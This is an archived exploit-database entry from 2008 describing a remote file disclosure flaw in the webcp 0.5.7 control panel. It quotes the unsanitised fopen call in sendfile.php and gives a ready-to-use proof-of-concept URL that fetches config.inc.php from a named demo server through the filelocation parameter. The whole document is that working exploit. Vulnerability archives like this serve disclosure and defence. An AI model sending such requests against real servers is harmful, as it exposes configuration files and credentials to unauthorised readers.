exploit-db-mirror/platforms/php/webapps/6556.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

15 lines
655 B
Text
Executable file

##################################################################################
## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
## Demo : http://gyrbo.madoka.be/web-cp/
## Vuln :
## }
## if ($tf = fopen($filelocation, "r")) {
## // Date in the past
##################################################################################
## POC :
## http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
## Open By Mozilla Firefox
##################################################################################
# milw0rm.com [2008-09-24]